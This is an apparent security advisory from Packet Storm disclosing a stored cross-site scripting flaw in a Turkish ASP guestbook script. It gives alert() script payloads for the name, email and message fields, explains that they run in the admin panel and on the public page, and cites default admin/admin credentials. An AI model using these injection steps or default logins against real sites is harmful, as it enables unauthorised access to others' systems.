ASP Ziyareti Defteri version 1.1 suffers from a cross site scripting vulnerability.
bc197f832c78403927fd37f56dc4fa72ASP Ziyaretçi Defteri v1.1 (tr) XSS Vulnerability
#Software: ASP Ziyaretçi Defteri v1.1 (tr)
#download: http://www.aspindir.com/goster/4882
#demo: http://www.hiddenchest.com/kodlarim/ziyaret/
#Found By: GeFORC3 ( G3 )
#Exploit:
1-http://www.example.com/ziyaret/mesaj_formu.asp
Isim: <script>alert("G3");</script>
E-posta: <script>alert("G3");</script>
Mesajiniz: <script>alert("G3");</script>
Press to "Gönder"(send) button.
2-
Yönetici paneli (admin panel):
http://www.example.com/ziyaret/default.asp (default user:admin pass:admin)
press "gir" button.
http://www.example.com/default.asp?islem=login --> running xss code
This xss works on ASP Ziyaretçi Defteri v1.1 (tr) script's Yönetici Paneli
(admin panel)
if eðer admin mesajý onaylarsa (active ederse) xss code çalýþýr guestbook's
main page (ziyaretçi defterinin ana sayfasýnda)
if admin checked your message (xss code)
xss code running ASP Ziyaretçi Defteri v1.1's (guestbook's) main page (
http://example.com/ziyaret/ziyaretci_mesajlari.asp)
WwW.GeFORC3.Org | WwW.HeykirBlog.Org | WwW.NetKaBus.Com
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!